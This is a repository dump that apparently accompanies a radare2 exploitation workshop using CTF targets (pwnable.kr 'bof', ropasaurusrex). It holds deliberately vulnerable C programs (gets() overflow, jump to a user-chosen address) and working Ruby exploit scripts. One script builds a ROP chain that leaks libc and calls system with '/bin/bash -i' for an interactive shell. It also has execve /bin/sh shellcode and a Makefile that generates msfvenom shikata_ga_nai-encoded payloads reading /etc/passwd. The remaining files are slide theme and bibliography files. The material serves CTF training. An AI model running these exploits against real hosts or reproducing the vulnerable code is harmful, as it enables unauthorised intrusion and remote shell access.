https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/r2-nativedebug.png -------------------------------------------------------------------------------- /pix/radiff2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/radiff2.png -------------------------------------------------------------------------------- /pix/regstacklisting.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/regstacklisting.png -------------------------------------------------------------------------------- /pix/rop.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/rop.png -------------------------------------------------------------------------------- /pix/rop_pwn1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/rop_pwn1.png -------------------------------------------------------------------------------- /pix/segfault_pwn1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/segfault_pwn1.png -------------------------------------------------------------------------------- /pix/socat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/socat.png -------------------------------------------------------------------------------- /pix/system_offset.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/system_offset.png -------------------------------------------------------------------------------- /pix/web.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/web.png -------------------------------------------------------------------------------- /pix/writable.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/writable.png -------------------------------------------------------------------------------- /pix/you.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/you.png -------------------------------------------------------------------------------- /pwns/bof/bof/bof: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pwns/bof/bof/bof -------------------------------------------------------------------------------- /pwns/bof/bof/bof.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | void func(int key){ 5 | char overflowme[32]; 6 | printf("overflow me : "); 7 | gets(overflowme); // smash me! 8 | if(key == 0xcafebabe){ 9 | system("/bin/sh"); 10 | } 11 | else{ 12 | printf("Nah..\n"); 13 | } 14 | } 15 | int main(int argc, char* argv[]){ 16 | func(0xdeadbeef); 17 | return 0; 18 | } 19 | 20 | -------------------------------------------------------------------------------- /pwns/bof/bof/bof.rr2: -------------------------------------------------------------------------------- 1 | #!/usr/bin/rarun2 2 | program=./bof 3 | stdin=./pattern.txt 4 | -------------------------------------------------------------------------------- /pwns/bof/bof/pattern.txt: -------------------------------------------------------------------------------- 1 | AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAZAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABZABYABZABaABbABcABdABeABfABgABhABiABjABkABlABmABnABoABpABqABrABsABtABuABvABwABxAByABzAB1AB2AB3AB4AB5AB6AB7AB8AB9AB0ACBACCACDACEACFACGACHACIACJACKACLACMACNACOACPACQACRACSACTACUACVACWACZACYACZACaACbACcACdACeACfACgAChACiACjACkAClACmACnACoACpACqACrACsACtACuACvACwACxACyACzAC1AC2AC3AC4AC5AC6AC7AC8AC9AC0ADBADCADDADEADFADGADHADIADJADKADLADMADNADOADPADQADRADSADTADUADVADWADZADYADZADaADbADcADdADeADfADgADhADiADjADkADlADmADnADoADpADqADrADsADtADuADvADwADxADyADzAD1AD2AD3AD4AD5AD6AD7AD8AD9AD0AEBAECAEDAEEAEFAEGAEHAEIAEJAEKAELAEMAENAEOAEPAEQAERAESAETAEUAEVAEWAEZAEYAEZAEaAEbAEcAEdAEeAEfAEgAEhAEiAEjAEkAElAEmAEnAEoAEpAEqAErAEsAEtAEuAEvAEwAExAEyAEzAE1AE2AE3AE4AE5AE6AE7AE8AE9AE0AFBAFCAFDAFEAFFAFGAFHAFIAFJAFKAFLAFMAFNAFOAFPAFQAFRAFSAFTAFUAFVAFWAFZAFYAFZAFaAFbAFcAFdAFeAFfAFgAFhAFiAFjAFkAFlAFmAFnAFoAFpAFqAFrAFsAFtAFuAFvAFwAFxAFyAFzAF1AF2AF3AF4AF5AF6AF7AF8AF9AF0AGBAGCAGDAGEAGFAGGAGHAGIAGJAGKAGLAGMAGNAGOAGPAGQAGRAGSAGTAGUAGVAGWAGZAGYAGZAGaAGbAGcAGdAGeAGfAGgAGhAGiAGjAGkAGlAGmAGnAGoAGpAGqAGrAGsAGtAGuAGvAGwAGxAGyAGzAG1AG2AG3AG4AG5AG6AG7AG8AG9AG0AHBAHCAHDAHEAHFAHGAHHAHIAHJAHKAHLAHMAHNAHOAHPAHQAHRAHSAHTAHUAHVAHWAHZAHYAHZAHaAHbAHcAHdAHeAHfAHgAHhAHiAHjAHkAHlAHmAHnAHoAHpAHqAHrAHsAHtAHuAHvAHwAHxAHyAHzAH1AH2AH3AH4AH5AH6AH7AH8AH9AH0AIBAICAIDAIEAIFAIGAIHAIIAIJAIKAILAIMAINAIOAIPAIQAIRAISAITAIUAIVAIWAIZAIYAIZAIaAIbAIcAIdAIeAIfAIgAIhAIiAIjAIkAIlAImAInAIoAIpAIqAIrAIsAItAIuAIvAIwAIxAIyAIzAI1AI2AI3AI4AI5AI6AI7AI8AI9AI0AJBAJCAJDAJEAJFAJGAJHAJIAJJAJKAJLAJMAJNAJOAJPAJQAJRAJSAJTAJUAJVAJWAJZAJYAJZAJaAJbAJcAJdAJeAJfAJgAJhAJiAJjAJkAJlAJmAJnAJoAJpAJqAJrAJsAJtAJuAJvAJwAJxAJyAJzAJ1AJ2AJ3AJ4AJ5AJ6AJ7AJ8AJ9AJ0AKBAKCAKDAKEAKFAKGAKHAKIAKJAKKAKLAKMAKNAKOAKPAKQAKRAKSAKTAKUAKVAKWAKZAKYAKZAKaAKbAKcAKdAKeAKfAKgAKhAKiAKjAKkAKlAKmAKnAKoAKpAKqAKrAKsAKtAKuAKvAKwAKxAKyAKzAK1AK2AK3AK4AK5AK6AK7AK8AK9AK0ALBALCALDALEALFALGALHALIALJALKALLALMALNALOALPALQALRALSALTALUALVALWALZALYALZALaALbALcALdALeALfALgALhALiALjALkALlALmALnALoALpALqALrALsALtALuALvALwALxALyALzAL1AL2AL3AL4AL5AL6AL7AL8AL9AL0AMBAMCAMDAMEAMFAMGAMHAMIAMJAMKAMLAMMAMNAMOAMPAMQAMRAMSAMTAMUAMVAMWAMZAMYAMZAMaAMbAMcAMdAMeAMfAMgAMhAMiAMjAMkAMlAMmAMnAMoAMpAMqAMrAMsAMtAMuAMvAMwAMxAMyAMzAM1AM2AM3AM4AM5AM6AM7AM8AM9AM0ANBANCANDANEANFANGANHANIANJANKANLANMANNANOANPANQANRANSANTANUANVANWANZANYANZANaANbANcANdANeANfANgANhANiANjANkANlANmANnANoANpANqANrANsANtANuANvANwANxANyANzAN1AN2AN3AN4AN5AN6AN7AN8AN9AN0AOBAOCAODAOEAOFAOGAOHAOIAOJAOKAOLAOMAONAOOAOPAOQAORAOSAOTAOUAOVAOWAOZAOYAOZAOaAObAOcAOdAOeAOfAOgAOhAOiAOjAOkAOlAOmAOnAOoAOpAOqAOrAOsAOtAOuAOvAOwAOxAOyAOzAO1AO2AO3AO4AO5AO6AO7AO8AO9AO0APBAPCAPDAPEAPFAPGAPHAPIAPJAPKAPLAPMAPNAPOAPPAPQAPRAPSAPTAPUAPVAPWAPZAPYAPZAPaAPbAPcAPdAPeAPfAPgAPhAPiAPjAPkAPlAPmAPnAPoAPpAPqAPrAPsAPtAPuAPvAPwAPxAPyAPzAP1AP2AP3AP4AP5AP6AP7AP8AP9AP0AQBAQCAQDAQEAQFAQGAQHAQIAQJAQKAQLAQMAQNAQOAQPAQQAQRAQSAQTAQUAQVAQWAQZAQYAQZAQaAQbAQcAQdAQeAQfAQgAQhAQiAQjAQkAQlAQmAQnAQoAQpAQqAQrAQsAQtAQuAQvAQwAQxAQyAQzAQ1AQ2AQ3AQ4AQ5AQ6AQ7AQ8AQ9AQ0ARBARCARDAREARFARGARHARIARJARKARLARMARNAROARPARQARRARSARTARUARVARWARZARYARZARaARbARcARdAReARfARgARhARiARjARkARlARmARnARoARpARqARrARsARtARuARvARwARxARyARzAR1AR2AR3AR4AR5AR6AR7AR8AR9AR0ASBASCASDASEASFASGASHASIASJASKASLASMASNASOASPASQASRASSASTASUASVASWASZASYASZASaASbAScASdASeASfASgAShASiASjASkASlASmASnASoASpASqASrASsAStASuASvASwASxASyASzAS1AS2AS3AS4AS5AS6AS7AS8AS9AS0ATBATCATDATEATFATGATHATIATJATKATLATMATNATOATPATQATRATSATTATUATVATWATZATYATZATaATbATcATdATeATfATgAThATiATjATkATlATmATnAToATpATqATrATsATtATuATvATwATxATyATzAT1AT2AT3AT4AT5AT6AT7AT8AT9AT0AUBAUCAUDAUEAUFAUGAUHAUIAUJAUKAULAUMAUNAUOAUPAUQAURAUSAUTAUUAUVAUWAUZAUYAUZAUaAUbAUcAUdAUeAUfAUgAUhAUiAUjAUkAUlAUmAUnAUoAUpAUqAUrAUsAUtAUuAUvAUwAUxAUyAUzAU1AU2AU3AU4AU5AU6AU7AU8AU9AU0AVBAVCAVDAVEAVFAVGAVHAVIAVJAVKAVLAVMAVNAVOAVPAVQAVRAVSAVTAVUAVVAVWAVZAVYAVZAVaAVbAVcAVdAVeAVfAVgAVhAViAVjAVkAVlAVmAVnAVoAVpAVqAVrAVsAVtAVuAVvAVwAVxAVyAVzAV1AV2AV3AV4AV5AV6AV7AV8AV9AV0AWBAWCAWDAWEAWFAWGAWHAWIAWJAWKAWLAWMAWNAWOAWPAWQAWRAWSAWTAWUAWVAWWAWZ -------------------------------------------------------------------------------- /pwns/bof/bof/profile: -------------------------------------------------------------------------------- 1 | r2 -de dbg.profile=bof.rr2 bof 2 | -------------------------------------------------------------------------------- /pwns/bof/bof/pwn.rb: -------------------------------------------------------------------------------- 1 | require_relative 'shoe' 2 | s = Shoe.new "pwnable.kr", 9000 3 | offset = `ragg2 -q 0x41534141`.split("\n")[0].split(" ")[2].to_i 4 | pwn = "A" * offset + [0xcafebabe].pack("V") 5 | s.say pwn 6 | s.tie! 7 | -------------------------------------------------------------------------------- /pwns/bof/bof/shoe.rb: -------------------------------------------------------------------------------- 1 | require 'socket' 2 | require 'timeout' 3 | require 'rolling_timeout' 4 | 5 | class Shoe < TCPSocket 6 | def recv_until str 7 | buf = "" 8 | until buf.end_with? str do 9 | buf << self.recv(1) 10 | end 11 | buf 12 | end 13 | 14 | def recv_until_re regex 15 | buf = "" 16 | while not regex.match buf 17 | buf << self.recv(1) 18 | end 19 | buf 20 | end 21 | 22 | def say str 23 | self.send str, 0 24 | end 25 | 26 | def read_n_seconds secs 27 | # requires native threads. 28 | # doesn't work with ruby 1.8.x or lower 29 | buf = "" 30 | begin 31 | timeout(secs) do 32 | loop { 33 | buf << self.recv(1) 34 | } 35 | end 36 | rescue Timeout::Error 37 | end 38 | buf 39 | end 40 | 41 | def read_til_end timeout 42 | # timeout is time between chars 43 | buf = "" 44 | begin 45 | RollingTimeout.new(timeout) { |timer| 46 | loop { 47 | buf << self.recv(1) 48 | timer.reset 49 | } 50 | } 51 | rescue Timeout::Error 52 | end 53 | buf 54 | end 55 | 56 | def tie! 57 | # kick off a thread just reading forever 58 | Thread.new { loop { $stdout.write(self.recv(4096)) } } 59 | str = "" 60 | loop { 61 | ch = $stdin.read_nonblock(1) rescue nil 62 | if ch == nil 63 | next 64 | end 65 | self.send ch, 0 66 | } 67 | end 68 | end 69 | -------------------------------------------------------------------------------- /pwns/bof/bof/slide.txt: -------------------------------------------------------------------------------- 1 | finding offset into buffer 2 | 3 | de bruijn pattern (cyclic pattern, can find offset) 4 | made popular by metasploit/peda 5 | 6 | r2 has this feature 7 | 8 | bof - pwnablekr 9 | set dword to magic value 10 | 11 | ragg2 -P -r # generate pattern. 12 | debug profile can set args/stdin/etc, so we can set inputs 13 | 14 | r2 -de dbg.profile=bof.rr2 bof 15 | dcu sym.func 16 | db (check address) 17 | 0xf779b654 b 817d08bebafe. cmp dword [ebp + 8], 0xcafebabe ; [0xcafebabe:4]=-1 18 | dc 19 | 20 | drr = show registers with context. notice ebp points somewhere in our string, 21 | find the offset of this 22 | 23 | pxr 4 @ ebp + 8 # print hex with references 24 | 25 | [0xf779b62c]> pxr 4 @ ebp + 8 26 | 0xffebbd10 0x41534141 AASA ascii 27 | 28 | now we know where this is pointing, simple to get the offset! 29 | [0xf779b62c]> woO 0x41534141 30 | 52 31 | 32 | so ebp + 8 points 52 bytes into the buffer. 33 | -------------------------------------------------------------------------------- /pwns/magic/demo.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | int is_libc_line(char* line) { 8 | regex_t regex; 9 | int ret; 10 | int reti; 11 | char msgbuf[100]; 12 | 13 | /* Compile regular expression */ 14 | reti = regcomp(®ex, "libc-[[:digit:]].[[:digit:]][[:digit:]].so", 0); 15 | if( reti ){ fprintf(stderr, "Could not compile regex\n"); exit(1); } 16 | 17 | /* Execute regular expression */ 18 | reti = regexec(®ex, line, 0, NULL, 0); 19 | if( !reti ){ 20 | ret = 1; 21 | } 22 | else if( reti == REG_NOMATCH ){ 23 | ret = 0; 24 | } 25 | else{ 26 | regerror(reti, ®ex, msgbuf, sizeof(msgbuf)); 27 | fprintf(stderr, "Regex match failed: %s\n", msgbuf); 28 | exit(1); 29 | } 30 | /* Free compiled regular expression if you want to use the regex_t again */ 31 | regfree(®ex); 32 | 33 | return ret; 34 | } 35 | 36 | intptr_t get_base_addr() { 37 | FILE * fp; 38 | char * line = NULL; 39 | size_t len = 0; 40 | ssize_t read; 41 | int matched = 0; 42 | intptr_t libc_base = 0; 43 | 44 | fp = fopen("/proc/self/maps", "r"); 45 | if (fp == NULL) 46 | exit(EXIT_FAILURE); 47 | 48 | while ((read = getline(&line, &len, fp)) != -1) { 49 | matched = is_libc_line (line); 50 | if (matched) { 51 | libc_base = strtoull(line, NULL, 16); 52 | break; 53 | } 54 | } 55 | 56 | fclose(fp); 57 | if (line) free(line); 58 | return libc_base; 59 | } 60 | 61 | int main(int argc, char** argv) { 62 | setvbuf(stdout, NULL, _IONBF, 0); 63 | intptr_t libc_base = get_base_addr (); 64 | printf("libc base addr - %p\n", (void*)libc_base); 65 | unsigned long long input_value; 66 | printf("where should I jump to [base 10]? "); 67 | scanf("%llu", &input_value); 68 | void (*func_ptr)(void) = (void (*)(void))input_value; 69 | asm __volatile__ ("xor %rsi, %rsi;"); 70 | asm __volatile__ ("push %rsi"); 71 | func_ptr(); 72 | } 73 | -------------------------------------------------------------------------------- /pwns/magic/pwn.rb: -------------------------------------------------------------------------------- 1 | require_relative 'shoe' 2 | s = Shoe.new "localhost", 8888 3 | blah = s.read_n_seconds 0.5 4 | rce = blah.split[4].hex + 0x000f170d 5 | s.say "#{rce}\n" 6 | s.tie! 7 | -------------------------------------------------------------------------------- /pwns/magic/shoe.rb: -------------------------------------------------------------------------------- 1 | require 'socket' 2 | require 'timeout' 3 | require 'rolling_timeout' 4 | 5 | class Shoe < TCPSocket 6 | def recv_until str 7 | buf = "" 8 | until buf.end_with? str do 9 | buf << self.recv(1) 10 | end 11 | buf 12 | end 13 | 14 | def recv_until_re regex 15 | buf = "" 16 | while not regex.match buf 17 | buf << self.recv(1) 18 | end 19 | buf 20 | end 21 | 22 | def say str 23 | self.send str, 0 24 | end 25 | 26 | def read_n_seconds secs 27 | # requires native threads. 28 | # doesn't work with ruby 1.8.x or lower 29 | buf = "" 30 | begin 31 | timeout(secs) do 32 | loop { 33 | buf << self.recv(1) 34 | } 35 | end 36 | rescue Timeout::Error 37 | end 38 | buf 39 | end 40 | 41 | def read_til_end timeout 42 | # timeout is time between chars 43 | buf = "" 44 | begin 45 | RollingTimeout.new(timeout) { |timer| 46 | loop { 47 | buf << self.recv(1) 48 | timer.reset 49 | } 50 | } 51 | rescue Timeout::Error 52 | end 53 | buf 54 | end 55 | 56 | def tie! 57 | # kick off a thread just reading forever 58 | Thread.new { loop { $stdout.write(self.recv(4096)) } } 59 | str = "" 60 | loop { 61 | ch = $stdin.read_nonblock(1) rescue nil 62 | if ch == nil 63 | next 64 | end 65 | self.send ch, 0 66 | } 67 | end 68 | end 69 | -------------------------------------------------------------------------------- /pwns/rop/pwn.rb: -------------------------------------------------------------------------------- 1 | require_relative 'shoe' 2 | require 'r2pipe' 3 | require 'json' 4 | require 'pry' 5 | 6 | def get_symbol_addr json, name 7 | json.each{|i| 8 | if i["name"] == name 9 | return i["vaddr"] 10 | end 11 | } 12 | end 13 | 14 | # open up a r2pipe to our binary, and to libc 15 | r2pbin = R2Pipe.new "./ropasaurusrex" 16 | r2plibc = R2Pipe.new "/lib/i386-linux-gnu/libc.so.6" 17 | 18 | # get symbols from binary and libc 19 | binsyms = JSON.parse(r2pbin.cmd("isj")) 20 | binreloc = JSON.parse(r2pbin.cmd("iRj")) 21 | libcsyms = JSON.parse(r2plibc.cmd("isj")) 22 | 23 | # resolve symbols from the binary 24 | read_plt = get_symbol_addr binsyms, "imp.read" 25 | write_plt = get_symbol_addr binsyms, "imp.write" 26 | read_got = get_symbol_addr binreloc, "read" 27 | 28 | # find the pppr 29 | r2pbin.cmd("e rop.len = 4") 30 | pppr = r2pbin.cmd('"/R/ pop;pop;pop;ret"').split[0].hex 31 | 32 | # find the libc system and read addresses 33 | system_libc = get_symbol_addr libcsyms, "system" 34 | read_libc = get_symbol_addr libcsyms, "read" 35 | 36 | # this is hard coded in... r2 isnt magic 37 | vuln_addr = 0x080483F4 38 | 39 | # find a place to write 40 | segments = JSON.parse(r2pbin.cmd("iSj")) 41 | command = "/bin/bash -i 2>&1" 42 | target_size = command.size + 1 # big enough for our command to write in 43 | target_perm = "w" # we need writeable 44 | target_addr = 0 45 | segments.each{|i| 46 | if i["flags"].include? target_perm and i["size"] >= target_size 47 | target_addr = i["vaddr"] 48 | break 49 | end 50 | } 51 | 52 | s = Shoe.new "localhost", 8888 53 | 54 | padding_len = r2pbin.cmd("woO 0x41417641").to_i # found this already in debugger 55 | stage1 = "A" * padding_len 56 | stage1 = stage1 + [write_plt, pppr, 1, read_got, 4].pack("V*") 57 | stage1 = stage1 + [read_plt, pppr, 0, target_addr, command.size + 1].pack("V*") 58 | stage1 = stage1 + [vuln_addr].pack("V*") 59 | s.say "#{stage1}" 60 | sleep 0.1 61 | s.say command + "\x00" 62 | sleep 0.1 63 | leak = s.recv(4).unpack("V")[0] 64 | libc_base = leak - read_libc 65 | resolved_system = libc_base + system_libc 66 | stage2 = "A" * padding_len 67 | stage2 = stage2 + [resolved_system, 0x11111111, target_addr].pack("V*") 68 | s.say "#{stage2}" 69 | s.tie! 70 | -------------------------------------------------------------------------------- /pwns/rop/ropasaurusrex: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pwns/rop/ropasaurusrex -------------------------------------------------------------------------------- /pwns/rop/shoe.rb: -------------------------------------------------------------------------------- 1 | require 'socket' 2 | require 'timeout' 3 | require 'rolling_timeout' 4 | 5 | class Shoe < TCPSocket 6 | def recv_until str 7 | buf = "" 8 | until buf.end_with? str do 9 | buf << self.recv(1) 10 | end 11 | buf 12 | end 13 | 14 | def recv_until_re regex 15 | buf = "" 16 | while not regex.match buf 17 | buf << self.recv(1) 18 | end 19 | buf 20 | end 21 | 22 | def say str 23 | self.send str, 0 24 | end 25 | 26 | def read_n_seconds secs 27 | # requires native threads. 28 | # doesn't work with ruby 1.8.x or lower 29 | buf = "" 30 | begin 31 | timeout(secs) do 32 | loop { 33 | buf << self.recv(1) 34 | } 35 | end 36 | rescue Timeout::Error 37 | end 38 | buf 39 | end 40 | 41 | def read_til_end timeout 42 | # timeout is time between chars 43 | buf = "" 44 | begin 45 | RollingTimeout.new(timeout) { |timer| 46 | loop { 47 | buf << self.recv(1) 48 | timer.reset 49 | } 50 | } 51 | rescue Timeout::Error 52 | end 53 | buf 54 | end 55 | 56 | def tie! 57 | # kick off a thread just reading forever 58 | Thread.new { loop { $stdout.write(self.recv(4096)) } } 59 | str = "" 60 | loop { 61 | ch = $stdin.read_nonblock(1) rescue nil 62 | if ch == nil 63 | next 64 | end 65 | self.send ch, 0 66 | } 67 | end 68 | end 69 | -------------------------------------------------------------------------------- /pwns/shellcode/binsh.elf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pwns/shellcode/binsh.elf -------------------------------------------------------------------------------- /pwns/shellcode/binsh.r: -------------------------------------------------------------------------------- 1 | execve@syscall(59) 2 | 3 | main@global(32) { 4 | .var0 = "/bin/sh" 5 | execve(.var0, 0, 0); 6 | } 7 | -------------------------------------------------------------------------------- /refs.bib: -------------------------------------------------------------------------------- 1 | @online{r2types, 2 | title = {Radare2 types command}, 3 | url = {http://radare.today/types}, 4 | year = {2014}, 5 | } 6 | @online{r2windbg, 7 | title = {WinDbg in radare2}, 8 | url = {https://github.com/radare/radare2/blob/master/doc/windbg}, 9 | year = {2014}, 10 | } 11 | @online{r2pipe, 12 | title = {R2pipe API}, 13 | url = {https://github.com/radare/radare2/wiki/R2PipeAPI}, 14 | year = {2014}, 15 | } 16 | @misc{uefitool, 17 | author = {Nicolaj Shlej}, 18 | title = {}, 19 | year = {2013}, 20 | publisher = {GitHub}, 21 | journal = {GitHub repository}, 22 | howpublished = {\url{https://github.com/LongSoft/UEFITool}}, 23 | } 24 | @misc{openreil, 25 | author = {Dmytro Oleksiuk}, 26 | title = {}, 27 | year = {2015}, 28 | publisher = {GitHub}, 29 | journal = {GitHub repository}, 30 | howpublished = {\url{https://github.com/Cr4sh/openreil}}, 31 | } 32 | @misc{ida-efiutils, 33 | author = {snare}, 34 | title = {}, 35 | year = {2014}, 36 | publisher = {GitHub}, 37 | journal = {GitHub repository}, 38 | howpublished = {\url{https://github.com/snare/ida-efiutils}}, 39 | } 40 | @misc{qemu-omap, 41 | author = {Anton Kochkov}, 42 | title = {QEMU patched for loading OMAP bootroms}, 43 | year = {2013}, 44 | publisher = {GitHub}, 45 | journal = {GitHub repository}, 46 | howpublished = {\url{https://github.com/XVilka/qemu}}, 47 | } 48 | @online{bios-extract, 49 | title = {Bios\_extract}, 50 | url = {http://coreboot.org/Bios_extract}, 51 | year = {2015}, 52 | } 53 | @online{r2esiltv, 54 | title = {ESIL emulation in radare2}, 55 | url = {http://radare.tv/a/44}, 56 | year = {2014}, 57 | } 58 | @online{pwnablekr, 59 | title = {Pwnable kr}, 60 | url = {http://pwnable.kr}, 61 | year = {2015}, 62 | } 63 | -------------------------------------------------------------------------------- /shikata_ga_nai/Makefile: -------------------------------------------------------------------------------- 1 | SRC = slides.tex 2 | PDF = slides.pdf 3 | AUX = slides.aux 4 | TEXC := xelatex 5 | TEXC_OPTS += -shell-escape 6 | 7 | .PHONY: clean install slides 8 | 9 | all: $(PDF) shellcode 10 | 11 | slides: $(PDF) 12 | 13 | shellcode: 14 | /opt/msf/msfvenom -p linux/x86/exec -e x86/shikata_ga_nai -i 12 CMD='cat /etc/passwd' R > shellcode.shikata_ga_nai 15 | /opt/msf/msfvenom -p linux/x86/exec -e x86/call4_dword_xor -i 12 CMD='cat /etc/passwd' R > shellcode.xor 16 | 17 | $(AUX): 18 | $(TEXC) $(TEXC_OPTS) $(SRC) 19 | 20 | $(PDF): beamerthemem.sty $(AUX) $(SRC) 21 | $(TEXC) $(TEXC_OPTS) $(SRC) 22 | 23 | clean: 24 | @rm -f $(PDF) 25 | @git clean -xfd 26 | -------------------------------------------------------------------------------- /shikata_ga_nai/beamercolorthememetropolis.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamercolorthememetropolis.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamercolorthememetropolis.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamercolorthememetropolis}[2015/06/12 Metropolis color theme] 21 | \RequirePackage{pgfopts} 22 | \pgfkeys{ 23 | /metropolis/color/block/.cd, 24 | .is choice, 25 | transparent/.code=\@metropolis@block@transparent, 26 | fill/.code=\@metropolis@block@fill, 27 | } 28 | \pgfkeys{ 29 | /metropolis/color/background/.cd, 30 | .is choice, 31 | dark/.code=\@metropolis@colors@dark, 32 | light/.code=\@metropolis@colors@light, 33 | } 34 | \newcommand{\@metropolis@color@setdefaults}{ 35 | \pgfkeys{/metropolis/color/.cd, 36 | background=light, 37 | block=transparent, 38 | } 39 | } 40 | \definecolor{mDarkBrown}{HTML}{604c38} 41 | \definecolor{mDarkTeal}{HTML}{23373b} 42 | \definecolor{mLightBrown}{HTML}{EB811B} 43 | \definecolor{mLightGreen}{HTML}{14B03D} 44 | \newcommand{\@metropolis@colors@dark}{ 45 | \setbeamercolor{normal text}{% 46 | fg=black!2, 47 | bg=mDarkTeal 48 | } 49 | } 50 | \newcommand{\@metropolis@colors@light}{ 51 | \setbeamercolor{normal text}{% 52 | fg=mDarkTeal, 53 | bg=black!2 54 | } 55 | } 56 | \setbeamercolor{alerted text}{% 57 | fg=mLightBrown 58 | } 59 | \setbeamercolor{example text}{% 60 | fg=mLightGreen 61 | } 62 | \setbeamercolor{titlelike}{use=normal text, parent=normal text} 63 | \setbeamercolor{author}{use=normal text, parent=normal text} 64 | \setbeamercolor{date}{use=normal text, parent=normal text} 65 | \setbeamercolor{institute}{use=normal text, parent=normal text} 66 | \setbeamercolor{structure}{use=normal text, fg=normal text.fg} 67 | \setbeamercolor{palette primary}{% 68 | use=normal text, 69 | fg=normal text.bg, 70 | bg=normal text.fg 71 | } 72 | \setbeamercolor{frametitle}{% 73 | use=palette primary, 74 | parent=palette primary 75 | } 76 | \setbeamercolor{progress bar}{% 77 | use=alerted text, 78 | fg=alerted text.fg, 79 | bg=normal text.bg!50!normal text.fg 80 | } 81 | \setbeamercolor{title separator}{ 82 | use=progress bar, 83 | parent=progress bar 84 | } 85 | \setbeamercolor{progress bar in head/foot}{% 86 | use=progress bar, 87 | parent=progress bar 88 | } 89 | \setbeamercolor{progress bar in section page}{ 90 | use=progress bar, 91 | parent=progress bar 92 | } 93 | \newcommand{\@metropolis@block@transparent}{ 94 | \setbeamercolor{block title}{use=normal text, parent=normal text} 95 | } 96 | \newcommand{\@metropolis@block@fill}{ 97 | \setbeamercolor{block title}{% 98 | use=normal text, 99 | fg=normal text.fg, 100 | bg=normal text.bg!80!fg 101 | } 102 | } 103 | \setbeamercolor{block title alerted}{% 104 | use={block title, alerted text}, 105 | bg=block title.bg, 106 | fg=alerted text.fg 107 | } 108 | \setbeamercolor{block title example}{% 109 | use={block title, example text}, 110 | bg=block title.bg, 111 | fg=example text.fg 112 | } 113 | \setbeamercolor{block body alerted}{use=block body, parent=block body} 114 | \setbeamercolor{block body example}{use=block body, parent=block body} 115 | \setbeamercolor{block body}{ 116 | use={block title, normal text}, 117 | bg=block title.bg!50!normal text.bg 118 | } 119 | \setbeamercolor{footnote}{fg=normal text.fg!90} 120 | \setbeamercolor{footnote mark}{fg=.} 121 | \@metropolis@color@setdefaults 122 | \ProcessPgfPackageOptions{/metropolis/color} 123 | \mode 124 | \endinput 125 | %% 126 | %% End of file `beamercolorthememetropolis.sty'. 127 | -------------------------------------------------------------------------------- /shikata_ga_nai/beamerfontthememetropolis.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamerfontthememetropolis.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamerfontthememetropolis.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamerfontthememetropolis}[2015/06/12 Metropolis font theme] 21 | \RequirePackage[no-math]{fontspec} 22 | \defaultfontfeatures{Mapping=tex-text} 23 | \setsansfont[BoldItalicFont={Fira Sans Italic},% 24 | ItalicFont={Fira Sans Light Italic},% 25 | BoldFont={Fira Sans}]{Fira Sans Light} 26 | \setmonofont{Fira Mono} 27 